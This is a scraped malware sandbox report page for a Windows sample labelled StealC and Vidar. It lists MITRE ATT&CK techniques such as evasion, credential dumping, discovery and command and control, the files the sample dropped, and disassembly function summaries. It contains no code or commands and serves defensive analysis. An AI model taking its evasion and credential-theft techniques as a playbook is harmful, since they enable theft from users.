Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAKEGIJEHJDGDHJKJKKJDGCAAK

C:\ProgramData\AEBAFBGIDHCBFHIECFCBGHIEGD

C:\ProgramData\CGDHIEGCFHCGDGCAECBG

C:\ProgramData\GIEBGIIJ

C:\ProgramData\JKJEHJKJ

C:\ProgramData\KEBKJDBAAKJDGCBFHCFCGIEBFB

C:\ProgramData\KFCAFIIDHIDGHIECGDGI

C:\ProgramData\KKKJEBAAECBGDHIECAKJKKECFH

C:\ProgramData\KKKKEHJKFCFCBFHIIDGD

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 008A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 008945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 6C6535A0 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 294
stringtimeCOMMON

Function 0089BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 008A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00894880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 008A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00897710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre